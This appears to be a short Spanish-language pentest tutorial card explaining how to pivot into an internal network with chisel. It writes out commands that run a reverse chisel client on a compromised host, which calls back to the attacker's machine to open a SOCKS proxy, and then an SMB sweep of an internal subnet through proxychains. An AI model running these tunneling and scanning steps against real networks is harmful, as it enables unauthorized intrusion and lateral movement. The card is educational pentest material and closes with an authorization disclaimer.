KALI
Túneles con chisel
Cuando no tienes SSH en el objetivo, chisel hace el túnel sobre HTTP, que casi siempre está permitido de salida.
Arrancas el servidor de chisel en tu máquina, y en el equipo comprometido corres el cliente, que se conecta de vuelta y abre un proxy SOCKS. Desde ahí, con proxychains, llegas a toda la red interna.
Es ligero, un solo binario, y atraviesa firewalls que solo dejan salir web. La herramienta favorita para pivotar hoy.
# los comandos
kali@kali:~$ chisel server -p 8080 --reversecopiarserver listening on 0.0.0.0:8080
victim$ ./chisel client 10.0.0.50:8080 R:sockscopiarConnected (SOCKS proxy en el server)
kali@kali:~$ proxychains crackmapexec smb 172.16.5.0/24copiarSolo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.